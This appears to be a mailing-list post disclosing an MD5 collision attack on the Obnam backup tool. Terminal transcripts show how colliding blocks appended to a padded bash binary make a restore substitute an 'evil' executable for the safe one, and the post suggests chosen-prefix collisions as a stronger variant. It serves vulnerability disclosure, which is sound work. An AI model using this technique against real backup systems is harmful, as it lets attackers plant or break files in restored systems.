Lars Wirzenius wrote: > I agree that this attack would work. It's not exactly likely (MD5 > collisions are still not trivial, in my understanding, to generate), > but it's clear Obnam needs to switch.
md5sum collisions can be downloaded from Wikipedia. So.. joey@darkstar:~>md5sum a b 79054025255fb1a26e4bc422aef54eb4 a 79054025255fb1a26e4bc422aef54eb4 b joey@darkstar:~>cmp a b a b differ: byte 20, line 1 - exit 1 joey@darkstar:~>mkdir test joey@darkstar:~>mkdir test/bad joey@darkstar:~>cp a test/bad/file joey@darkstar:~>mkdir repo joey@darkstar:~>obnam -r repo backup test/ Backed up 3 files (of 3 found), uploaded 128.0 B in 0s at 1.6 KiB/s average speed joey@darkstar:~>mkdir test/good joey@darkstar:~>cp b test/good/file joey@darkstar:~>obnam -r repo backup test/ Backed up 4 files (of 5 found), uploaded 0.0 B in 0s at 0.0 B/s average speed joey@darkstar:~>obnam -r repo restore --to test.restored Restored 8 files, downloaded 256.0 B in 0s at 14.6 KiB/s average speed joey@darkstar:~>cmp test.restored/home/joey/test/bad/file test.restored/home/joey/test/good/file joey@darkstar:~> So far so bad, but these colliding files were produced by some security researcher (in 2004) not me. So they're not going to do something evil by themselves. But, obnam md5s files in blocks. By default 1 mb blocks. So, I can simply use any ELF executable I like, padded to 1 megabyte long, and stick the colliding file at the end of it. That limits what I can do with the exploit -- since I'm relying on a random colliding block, I can't put my exploit code in that. Both versions of my executable will need to examine what's appended to it, and enable exploit code that's built into the executable when it sees the triggering data. joey@darkstar:~>ls -l bash -rwxr-xr-x 1 joey joey 1048576 Mar 16 14:07 bash* joey@darkstar:~>cp bash toupload joey@darkstar:~>cat b >> toupload joey@darkstar:~>cp bash evil joey@darkstar:~>cat a >> evil joey@darkstar:~>cmp evil toupload evil toupload differ: byte 1048596, line 4243 joey@darkstar:~>rm -rf test repo joey@darkstar:~>mkdir repo test test/bin test/ftp joey@darkstar:~>cp evil test/ftp/ joey@darkstar:~>obnam -r repo backup test/ Backed up 4 files (of 4 found), uploaded 1.0 MiB in 0s at 10.3 MiB/s average speed joey@darkstar:~>cp toupload test/bin/bash joey@darkstar:~>obnam -r repo backup test/ Backed up 4 files (of 5 found), uploaded 0.0 B in 0s at 0.0 B/s average speed (Note 0 bytes in second backup) joey@darkstar:~>obnam -r repo restore --to test.restored File checksum restore error: /home/joey/test/bin/bash Restored 8 files, downloaded 2.0 MiB in 0s at 24.7 MiB/s average speed ERROR: There were errors when restoring - exit 1 joey@darkstar:~>cmp test.restored/home/joey/test/bin/bash evil joey@darkstar:~> Obnam replaced the safe version of bin/bash with the evil version. It told me it was doing it, but in reality I'm a harried sysadmin in a disaster recovery scenario and the checksum error message scrolled off the screen 10 minutes ago.. The checksum error happens because obnam stores a md5sum of the whole file, and the files as a whole have different md5sums. 37943662e8496d259e373eb2591578d4 toupload 69d94e6864510fb0a416ddd1567a3dcb evil It would probably be good to make obnam refuse to write out a file when its checksum is wrong. I don't think it solves the attack though. A system restored without bin/bash wouldn't boot. But then the attacker could make the restore skip an arbitrary file, which is probably enough to break the system in some way that allows further exploits. All of the above is the weakest approach to the attack. Much better would be a chosen prefix md5 attack. It would defeat the whole file checksum too, and would let the exploit code be shipped only in the evil version of the executable, not both versions. From what I've read, a chosen-prefix md5 attack is not extremely hard. (complexity 2^39) -- see shy jo
signature.asc
Description: Digital signature
